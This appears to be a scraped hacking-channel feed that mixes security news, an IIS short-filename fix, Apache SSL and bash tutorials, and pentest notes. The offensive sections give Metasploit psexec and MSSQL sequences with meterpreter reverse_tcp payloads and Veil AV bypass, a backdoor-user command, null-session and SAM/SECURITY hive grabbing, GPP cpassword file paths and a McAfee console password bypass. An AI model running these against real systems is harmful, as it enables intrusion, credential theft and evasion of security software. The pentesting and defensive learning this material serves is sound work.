UNDERCODE SECURITY
🦑 WELCOME TO UNDERCODE TESTING: LEARN HACKING | PROGRAMMING | SECURITY & more..

THIS CHANNEL BY :

@UndercodeTesting
UndercodeTesting.com (official)

@iUndercode
iUndercode.com (iOS)

@Dailycve
DailyCve.com


@UndercodeNews
UndercodeNews.com
Forwarded from UNDERCODE HACKING
A penetration tester's guide to sub-domain enumeration.pdf (653.3 KB)
A penetration tester's guide to subdomain enumeration, for beginners
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Fix a hacked host - IIS repair methods:
> Combined with a data review and repair plan:

Turn off NTFS 8.3 file name support. This feature is enabled by default, and most users do not need it.

If you are a virtual host (shared hosting) user, please contact the hosting provider for the repair. Vulnerability description: IIS short file name disclosure vulnerability. A file enumeration flaw exists in the IIS implementation; attackers can use it to enumerate and obtain files in the root directory of the server.

1. Modify the registry key (restart the server for the change to take effect):

HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\NtfsDisable8dot3NameCreation

Set the value to 1.

2. Or execute the DOS (command prompt) command: fsutil behavior set disable8dot3 1

3. If your web environment does not require ASP.NET support, open Internet Information Services (IIS) Manager --- Web Service Extensions --- ASP.NET and choose to prohibit (disable) this extension.

4. Upgrade the .NET Framework to version 4.0 or higher.

5. Delete the existing IIS web directory and redeploy it; completing this step finishes the repair.

Copy the contents of the web folder to another location, for example D:\www to D:\www.back, then delete the original folder D:\www, and finally rename D:\www.back to D:\www. Disabling 8.3 names only stops new short names from being created, so if you do not copy the folder again the existing short file names will not disappear.

After this operation a penetration scan was run again, and no IIS short file name vulnerabilities were found.

ENJOY ❤️👍
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Twitter, afraid of being investigated again, proactively reports the hacking incident to the EU
#NEWS

> Sina Technology News, evening of July 22, Beijing time. According to foreign media reports, a few days after the worst security breach in the company's history, Twitter took the initiative to report the incident to the EU data protection agency.

> Graham Doyle, spokesperson for the Irish Data Protection Commission (DPC), the EU data protection agency, said today that the regulator has received notification of the incident. The DPC is the main regulator for Twitter and other American technology companies in the European Union, because these companies have their European headquarters in Ireland.

> Currently, Twitter is working hard to deal with this, its most serious security incident. Twitter announced on Wednesday night that, by obtaining control of Twitter employee credentials, hackers had hijacked accounts including those of Democratic presidential candidate Joe Biden, former President Barack Obama, reality TV star Kim Kardashian, and tech billionaire and Tesla founder Elon Musk.

> Twitter later stated that the hackers targeted 130 accounts this time, controlled 45 of them by resetting their passwords, and issued "tweets" (Twitter messages) through them. In addition, Twitter confirmed that the attackers successfully manipulated a small number of internal employees and used their credentials to access Twitter's internal systems.

> In May 2018, the EU's new data privacy regulation, the General Data Protection Regulation (GDPR), came into effect. In October of the same year, Twitter was investigated for user data tracking in Europe. That was the first time Twitter had faced an investigation after the GDPR took effect. (Li Ming)



🦑 AVBypass:

1) Generate an executable using Veil.

2) In msfconsole set up psexec with the relevant payload (windows/meterpreter/reverse_tcp):

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.0.2
RHOST => 192.168.0.2
msf exploit(psexec) > set SMBUser user
SMBUser => user
msf exploit(psexec) > set SMBPass pass
SMBPass => pass
msf exploit(psexec) > set EXE::Custom /root/Desktop/Misc/Veil-master/payload.exe
EXE::Custom => /root/Desktop/Misc/Veil-master/payload.exe
msf exploit(psexec) > exploit


🦑 BUILD YOUR OWN Apache SSL:

# Enabling self-signed certificates on a local website

1. Install OpenSSL

sudo apt-get install openssl

2. Run the following command to generate the self-signed SSL certificate and its private key (you will be prompted for the certificate subject fields):

sudo openssl req -x509 -nodes -days 1095 -newkey rsa:2048 -out /etc/ssl/certs/server.crt -keyout /etc/ssl/private/server.key

3. Enable the SSL module for Apache

sudo a2enmod ssl

4. Make the default-ssl site available by creating a symbolic link

sudo ln -s /etc/apache2/sites-available/default-ssl.conf /etc/apache2/sites-enabled/000-default-ssl.conf

5. Edit the file default-ssl.conf

sudo nano /etc/apache2/sites-enabled/000-default-ssl.conf

Change the following lines to point to the certificate and key:

SSLCertificateFile /etc/ssl/certs/server.crt
SSLCertificateKeyFile /etc/ssl/private/server.key

6. Restart Apache

sudo /etc/init.d/apache2 restart

More information:
https://hallard.me/enable-ssl-for-apache-server-in-5-minutes/
https://www.sslshopper.com/article-how-to-create-and-install-an-apache-self-signed-certificate.html
http://www.akadia.com/services/ssh_test_certificate.html
https://www.sslshopper.com/apache-server-ssl-installation-instructions.html
http://www.emreakkas.com/linux-tips/invalid-command-sslengine-enabling-ssl-on-ubuntu-server
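As an added example (not part of the original post), the openssl step from above wrapped in a script that runs non-interactively, adds a subjectAltName (what browsers actually match the host name against) and checks that the generated key and certificate belong together before they go into default-ssl.conf. The output directory and host name are caller-supplied placeholders; the openssl CLI is assumed to be installed.

```shell
#!/bin/sh
# Added example, not from the original post. Same idea as step 2 above, but
# scripted: self-signed cert with a subjectAltName, plus two sanity checks.
# Assumes the openssl CLI; DIR and HOST are placeholders chosen by the caller.
set -eu

# make_selfsigned_cert DIR HOST [DAYS] -> writes DIR/server.key and DIR/server.crt
make_selfsigned_cert() {
    dir=$1; host=$2; days=${3:-1095}
    mkdir -p "$dir"
    # Minimal config: browsers check subjectAltName, not only the CN.
    cat > "$dir/openssl.cnf" <<EOF
[req]
distinguished_name = dn
x509_extensions = v3_srv
prompt = no
[dn]
CN = $host
[v3_srv]
subjectAltName = DNS:$host
basicConstraints = CA:FALSE
keyUsage = digitalSignature, keyEncipherment
extendedKeyUsage = serverAuth
EOF
    openssl req -x509 -nodes -days "$days" -newkey rsa:2048 \
        -config "$dir/openssl.cnf" \
        -keyout "$dir/server.key" -out "$dir/server.crt" 2>/dev/null
    chmod 600 "$dir/server.key"   # the private key must not be world-readable
}

# cert_matches_key CRT KEY -> "yes" if both carry the same public key; a
# mismatch is the usual cause of Apache refusing the SSLCertificateKeyFile.
cert_matches_key() {
    c=$(openssl x509 -in "$1" -noout -pubkey | openssl sha256)
    k=$(openssl pkey -in "$2" -pubout | openssl sha256)
    [ "$c" = "$k" ] && echo yes || echo no
}

# cert_san CRT -> the DNS name(s) from subjectAltName (portable: parses -text)
cert_san() {
    openssl x509 -in "$1" -noout -text \
        | grep -A1 'Subject Alternative Name' | tail -n 1 \
        | sed 's/^ *//; s/DNS://g'
}

# cert_valid_for_days CRT N -> exit 0 if CRT does not expire within N days
cert_valid_for_days() {
    openssl x509 -in "$1" -noout -checkend $(( $2 * 86400 ))
}
```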


🦑 Attacking MSSQL -
Attacking MSSQL with Metasploit

[>] Enumerate MSSQL servers on the network:

msf > use auxiliary/scanner/mssql/mssql_ping
nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156
Discover more servers using "Browse for More" in Microsoft SQL Server Management Studio.

[>] Bruteforce MSSQL database logins:

msf > use auxiliary/scanner/mssql/mssql_login

[>] Enumerate the MSSQL database:

msf > use auxiliary/admin/mssql/mssql_enum

[>] Gain a shell using the gathered credentials:

msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp


🦑 Simple Bash Scripting:

+ nano shortcuts
ctrl v Next page.
ctrl y Previous page.
ctrl w Where is (find).
ctrl k Cut that line of text.
ctrl x Exit editor.

+ Create a text file:
touch file Creates an empty file.
ifconfig > tmp Redirect the output of a command into a file (overwrites it).
nano file Open the file in the editor.

+ Create a file and append text to it:
ifconfig > tmp
echo >> tmp
ping google.com -c3 >> tmp

+ How to view a file:
cat file Show the entire contents of the file.
more file Show one page at a time. Space bar for the next page and (q) to exit.
head file Show the first 10 lines.
head -15 file Show the first 15 lines.
tail file Show the last 10 lines.
tail -15 file Show the last 15 lines.
tail -f file Follow the file as it grows; useful when viewing a log file.

+ pipe
cat tmp | grep Bcast Feeds the output of one process to the input of another process.

+ Processes
ps aux Show all running processes for all users.
kill -9 PID Forcibly kill a PID (SIGKILL; a plain kill PID sends SIGTERM and lets the process exit cleanly).

+ Word count
wc -l tmp2 Count the number of lines in a file.

+ cut
-d delimiter
-f fields

+ sort
sort -u file Sort and keep only unique lines.
sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n Sort IP addresses correctly (numerically, octet by octet).
cat tmp2 | cut -d '(' -f2 | cut -d ')' -f1 | sort -u Isolate the IP addresses.

+ awk
awk '{print $1}' file Show the 1st column.
awk '{print $1,$5}' file Show the 1st and 5th columns.

+ grep
grep -v Remove lines containing a single string.
grep -v 'red' file

+ egrep -v
egrep -v '(red|white|blue)' file Remove lines containing any of multiple strings.

+ sed
sed 's/FOO/BAR/g' file Replace FOO with BAR.
sed 's/FOO//g' file Replace FOO with nothing.
sed '/^FOO/d' file Remove lines that start with FOO.
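As an added example, not from the original post, the cut / sort / grep / awk / sed entries above chained over a constructed ping transcript (standing in for the "tmp2" file of the sort entry), showing why the octet-by-octet sort is needed:

```shell
#!/bin/sh
# Added example, not from the original post: the cheat-sheet commands chained
# over a constructed ping transcript (constructed sample, not real output).
SAMPLE='PING google.com (142.250.72.46) 56(84) bytes of data.
64 bytes from 142.250.72.46: icmp_seq=1 ttl=117 time=12.3 ms
PING mail.example.test (10.0.10.9) 56(84) bytes of data.
64 bytes from 10.0.10.9: icmp_seq=1 ttl=64 time=0.4 ms
PING www.example.test (10.0.2.200) 56(84) bytes of data.
PING web2.example.test (10.0.2.21) 56(84) bytes of data.
PING web3.example.test (10.0.2.200) 56(84) bytes of data.'

# isolate_ips: the "(ip)" field of every PING line, deduplicated and sorted
# numerically. A plain "sort" is lexical: it would put 10.0.2.200 before
# 10.0.2.21 and 10.0.10.9 before 10.0.2.21; -t . -k n,nn compares per octet.
isolate_ips() {
    printf '%s\n' "$SAMPLE" | grep '^PING' \
        | cut -d '(' -f2 | cut -d ')' -f1 \
        | sort -u | sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n
}

# hosts_outside PREFIX: grep -v drops one string, awk prints the host column
hosts_outside() {
    printf '%s\n' "$SAMPLE" | grep '^PING' | grep -v "($1" | awk '{print $2}'
}

# rtt_ms: sed keeps only the round-trip time of each reply line
rtt_ms() {
    printf '%s\n' "$SAMPLE" | grep 'time=' | sed 's/.*time=\([0-9.]*\) ms/\1/'
}

# count_replies: number of reply lines (grep -c counts like wc -l would)
count_replies() {
    printf '%s\n' "$SAMPLE" | grep -c '^64 bytes'
}

isolate_ips
```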


🦑 Create a Bash Script - Examples:

+ Simple bash script:
#!/bin/bash
clear
echo
echo
echo "Hello world."

+ Make a file executable.
chmod +x file
chmod 755 file

+ Variables
name=Bob
echo $name
user=$(whoami)
echo $user
echo 'Hello' $name. 'You are running as' $user.

#!/bin/bash
clear
echo "Hello World"
name=Bob
ip=$(ifconfig | grep "Bcast:" | cut -d":" -f2 | cut -d" " -f1)
echo "Hello" $name "Your IP address is:" $ip

+ User input
read -p "Domain: " domain

#!/bin/bash
echo "Please input your domain:"
read -p "Domain: " domain
ping -c 5 "$domain"

+ Check for no user input
if [ -z "$domain" ]; then
echo
echo "#########################"
echo
echo "Invalid choice."
echo
exit
fi

+ For loops
#!/bin/bash

for host in $(cat hosts.txt)
do
command $host
done

+ One liners

Port scan:
for port in $(cat Ports.txt); do nc -nzv 192.168.0.1 $port & sleep 0.5; done

Use a bash loop to find the IP address behind each host:
for url in $(cat list.txt); do host $url; done

+ Condition one-liner

any command && if it works || if it does not work
type -p massdns && massdns -r resolver.txt -t A -o S sub.txt -w sub.mass || echo "MassDns not installed"

+ Condition one-liner with multiple actions

any command && { if it works; also this; also this; } || { if it does not work; also this; also this; }
type -p massdns && { massdns -r resolver.txt -t A -o S sub.txt -w sub.mass; cat sub.mass; } || { echo "MassDns not installed"; echo "Install MassDns"; }
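As an added example, not from the original post, the input check, the hosts.txt loop and the "&& / ||" one-liner above rewritten as reusable functions: the check goes beyond "-z" so that a name typed at a read -p prompt cannot smuggle spaces or shell metacharacters into ping or host, and the loop reads the file line by line instead of word-splitting $(cat hosts.txt). The hosts file is constructed in a temporary directory and the per-host command is a harmless echo.

```shell
#!/bin/sh
# Added example, not from the original post. POSIX sh (command -v replaces
# the bash-only "type -p" of the one-liner above). Hosts file is constructed.

# valid_hostname NAME -> exit 0 if NAME is non-empty and looks like a host
# name (letters, digits, dots, dashes; no spaces or shell metacharacters).
valid_hostname() {
    [ -n "$1" ] && printf '%s' "$1" \
        | grep -Eq '^[A-Za-z0-9]([A-Za-z0-9.-]{0,252}[A-Za-z0-9])?$'
}

# for_each_host FILE CMD... -> run CMD on every valid line of FILE. Blank
# lines and "#" comments are skipped; malformed names go to stderr and the
# number of them becomes the exit status.
for_each_host() {
    file=$1; shift
    bad=0
    while IFS= read -r h || [ -n "$h" ]; do   # also handles a last line without \n
        case "$h" in ''|\#*) continue ;; esac
        if valid_hostname "$h"; then
            "$@" "$h"
        else
            echo "skipping malformed host: $h" >&2
            bad=$((bad + 1))
        fi
    done < "$file"
    return "$bad"
}

# have_tool NAME -> "yes"/"no", the "type -p massdns && ... || ..." pattern
have_tool() {
    command -v "$1" > /dev/null 2>&1 && echo yes || echo no
}

# demo: build the constructed hosts file and process it with echo
demo() {
    d=$(mktemp -d)
    printf '%s\n' 'www.example.test' '# comment' '' 'bad host;id' \
        'mail.example.test' > "$d/hosts.txt"
    for_each_host "$d/hosts.txt" echo "would query:" \
        || echo "$? host(s) skipped" >&2
    echo "massdns installed: $(have_tool massdns)"
    rm -rf "$d"
}
```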


🦑 A good, helpful build review guide:

+ Main tasks:

Any third-party installed software and all associated versions.
Password policy applied locally, via the net accounts command.
Domain policy applied, including the domain password policy.
Logging settings.
Running services and unquoted service paths.
Permissions set on services.
List of patches and hotfixes installed.
Efficacy of AV solutions. May require import of a benign EICAR test file.
USB policy and removable media access (including FireWire, CD etc.).
Disk encryption (if relevant).
BIOS passwords set.
Proxy settings (if relevant).
Nessus scan (with credentials).

+ Windows Hosts:

+ Server Roles
+ Server Manager
+ System Properties
+ Default Domain Policy
+ Global Domain Policy

+ Net accounts/Users/groups/Administrators
+ IPConfig/Routing

+ Installed Programs
+ Installed System Updates
+ AV Version/Definition Dates
+ Check Computer folders

+ Firewall Configuration
+ Audit Policy
+ Password/Lockout Policy
+ Security Policy
+ User Rights Policy



🦑 Helpful system info commands
#requested

1️⃣BIOS password
boot to usb
file system
- encrypted?
- grab /Windows/System32/config/SAM SECURITY SYSTEM
- put C:\Program.exe (eg calc)

2️⃣Control Panel
- Windows Firewall
- enabled
- editable
- logs
- System Info
- Windows Update

3️⃣Anti-Virus
- config
- logs
- version
- dates
- EICAR

4️⃣cmd.exe
script.cmd
- ipconfig /all
- netstat
- net accounts
- net accounts /domain (review password policy)
- net user hacker Password@1 /add
- regedit
- ping
- sched
- tracert
- net use \\<IP address or host name>\ipc$ "" /user:"" # null session
- net use
- net view
- net start
- tasklist

5️⃣mount usb
usb autostart

6️⃣copy over files
- nc
- enum
- nmap
- DIRE
- EICAR



🦑 Locate files from Ubuntu
> SAM files from BackTrack


/Windows/System32/config/SAM SECURITY SYSTEM

# mounting on desktop review
# mount <target> <mydir>
# sda1 = client hdd, sdb2 = my usb part 2
# mkdir /mnt/client-hdd
# mount /dev/sda1 /mnt/client-hdd
# mkdir /mnt/win-usb
# mount /dev/sdb2 /mnt/win-usb

hosts file C:\Windows\System32\drivers\etc\hosts.txt

SYSVOL GPO preference item, check for obscured passwords in xml
http://blogs.technet.com/b/grouppolicy/archive/2008/08/04/passwords-in-group-policy-preferences.aspx

🦑 The history file is readable by any authenticated user, as shown below:

C:\Users\All Users\Microsoft\Group Policy\History\{A1C0C41B-D2F8-401B-A5D1-437DA197A809}\Machine\Preferences\Groups\Groups.xml

The same Group Policy Preference XML configuration file is also accessible via the following UNC path on the Domain Controller, again by any authenticated user:

\\DomainController\sysvol\DomainName\Policies\{A1C0C41B-D2F8-401B-A5D1-437DA197A809}\Machine\Preferences\Groups\Groups.xml
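As an added example, not from the original post, a scan over a SYSVOL copy (for instance the share mounted as in the mount commands above) for Group Policy Preference XML files that still carry a non-empty cpassword attribute, so the preference item can be removed and the password rotated. The policy GUID is the one quoted above; the Groups.xml and Drives.xml contents and the cpassword value are constructed placeholders.

```shell
#!/bin/sh
# Added example, not from the original post: report GPP XML files under a
# SYSVOL (or mounted) tree that still store a cpassword. The GUID is the one
# quoted above; file contents and the password value are constructed.

# find_gpp_cpasswords DIR -> one line per affected file: "<path>\t<userName>".
# An empty cpassword="" is normal for items without a password and is not
# reported; only non-empty values are flagged.
find_gpp_cpasswords() {
    find "$1" -type f -iname '*.xml' -path '*Preferences*' 2>/dev/null \
    | while IFS= read -r f; do
        grep -Eqi 'cpassword="[^"]+"' "$f" || continue
        user=$(sed -n 's/.*userName="\([^"]*\)".*/\1/p' "$f" | head -n 1)
        printf '%s\t%s\n' "$f" "${user:-<no userName>}"
    done
}

# make_sample_sysvol DIR -> constructed policy tree used by demo (and tests)
make_sample_sysvol() {
    gpo="$1/Policies/{A1C0C41B-D2F8-401B-A5D1-437DA197A809}/Machine/Preferences"
    mkdir -p "$gpo/Groups" "$gpo/Drives"
    # local user item with a stored password (placeholder, not a real value)
    cat > "$gpo/Groups/Groups.xml" <<'EOF'
<?xml version="1.0" encoding="utf-8"?>
<Groups><User name="LocalAdmin" changed="2015-02-17 08:42:05">
  <Properties action="U" userName="LocalAdmin" cpassword="CONSTRUCTED-PLACEHOLDER"/>
</User></Groups>
EOF
    # mapped drive without a stored password: must not be reported
    cat > "$gpo/Drives/Drives.xml" <<'EOF'
<?xml version="1.0" encoding="utf-8"?>
<Drives><Drive name="H:">
  <Properties action="U" path="\\fileserver\home" cpassword="" userName=""/>
</Drive></Drives>
EOF
}

# demo: run the scan against the constructed tree
demo() {
    d=$(mktemp -d)
    make_sample_sysvol "$d"
    find_gpp_cpasswords "$d"
    rm -rf "$d"
}
demo
```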



🦑 A developer added a series of RISC-V UEFI support patches for Linux:
#NEWS

> Earlier this year the UEFI code in Linux was cleaned up, and then a series of early patches for RISC-V UEFI support was proposed, forming a more comprehensive patch set for enabling RISC-V UEFI support under Linux. Recently, developers have submitted a series of patches that solve a large number of problems and add some new capabilities to support RISC-V UEFI under Linux.

> Developer Atish Patra of Western Digital submitted 11 patches last Thursday. According to his introduction, patches 1-6 are preparatory patches that fix some common EFI and RISC-V issues; patches 7-9 add the EFI stub support for RISC-V that was submitted for review in April; patch 10 renames arm-init so that the common code can be used by other architectures; patch 11 adds runtime services for RISC-V.

🦑 In summary, the main contributions of this series of patches are:

1) Added full ioremap support.

2) Added EFI runtime service support.

3) Fixed the mm (memory management) problem.

4) At present, the patches have been verified using the bootefi command in U-Boot on QEMU, and they passed the test on both RISC-V 32-bit and RISC-V 64-bit. However, some problems with the EDK2 code on RISC-V are still being solved, mainly related to SPI and network drivers.

> This series of patches applies to Linux kernel 5.8-rc2 and is currently a PR awaiting code review. If the related problems are solved and it is finally accepted, it should be visible when Linux 5.8 is released.



🦑 McAfee VirusScan console user unlock password forgotten - solutions:

1) If the user unlock password of the McAfee VirusScan console is forgotten, the following solutions can be taken:

2) Restart the computer, enter safe mode, then open the registry and find

> HKEY_LOCAL_MACHINE\SOFTWARE\McAfee\DesktopProtection

3) Under that key find the UIP subkey, delete the subkey, and restart.

4) Alternatively: I have McAfee 8.5i installed and cannot unlock the console because I forgot the password. Online sources say to delete

> HKEY_LOCAL_MACHINE\SOFTWARE\McAfee\DesktopProtection\UIP in safe mode.

5) If we do not have that option, we instead modify the original value and replace it with a known one:

admin:19a2854144b63a8f7617a6f225019b12

6) If modification is forbidden, try IceSword; if that doesn't work either, call the computer room to reinstall the system.
